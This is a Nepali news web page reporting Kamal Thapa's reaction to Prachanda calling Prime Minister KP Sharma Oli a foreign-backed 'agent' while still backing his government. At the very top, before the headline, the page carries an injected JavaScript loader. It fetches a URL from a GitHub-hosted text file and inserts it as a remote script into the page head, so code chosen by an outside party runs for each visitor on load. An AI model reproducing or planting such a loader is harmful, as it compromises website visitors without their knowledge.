;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओलीलाई विदेशीका ‘एजेन्ट’ भनेको प्रति कमल थापाको आश्चर्य : समर्थन फिर्ता नलिने लाजमर्दो राजनीति! – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ओलीलाई विदेशीका ‘एजेन्ट’ भनेको प्रति कमल थापाको आश्चर्य : समर्थन फिर्ता नलिने लाजमर्दो राजनीति!
देश/प्रदेश

ओलीलाई विदेशीका ‘एजेन्ट’ भनेको प्रति कमल थापाको आश्चर्य : समर्थन फिर्ता नलिने लाजमर्दो राजनीति!

चैत ०९,

काठमाडौं । नेपाल कम्युनिष्ट पार्टी नेकपा माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ ले प्रधानमन्त्री केपी शर्मा ओलीलाई देशी विदेशीबाट पालित पोषित एजेन्ट’ भनि लगाएको आरोप प्रति राप्रपा अधयक्ष कमल थापाले आफूलाई आश्चर्य लागेको बताएका छन् ।

सोमबार राजधानीमा भएको एक कार्यक्रममा प्रचण्डले देशभित्रका संविधान विरोधी, गणतन्त्रविरोधी, देशबाहिरका प्रतिक्रियावादीहरु जसले यो संविधान स्वीकार्न सेकेका छैनन् । ती सबै मिलेर एउटा धार बनेको छ । ती सबैले नेपालमा यो संविधान निस्तेज पार्न सक्ने मान्छे खोज्दै जाँदा केपी ओली भेटेका छन्’ प्रचण्डले भनेका थिए ।

प्रचण्डको यस्तो भनाई प्रति थापाले आरोप प्रत्यारोप मात्रै गर्ने तर सरकारलाई दिएको दिएको समर्थन कायम राख्ने परिस्थिति देख्दा आफूलाई आश्चर्य लागेको बताएका हुन् ।

थापाले लेखेका छन् –

२पटक प्रधानमन्त्री भइसकेका प्रचण्डजीले केहीदिन अघिसम्म एउटै पार्टीमा रहेका अध्यक्ष र देशको प्रधानमन्त्री @kpsharmaoli
लाई ‘बर्षौदेखि विदेशीबाट पालित पोषित एजेन्ट’ भनि आरोप लगाएको सुन्दा आश्चर्य लागेकोछ।यस्तो गंभीर आरोप लगाउने,तर सरकारलाई दिएको समर्थन कायम राख्ने! लाजमर्दो राजनीति

फेसबुक प्रतिक्रियाहरु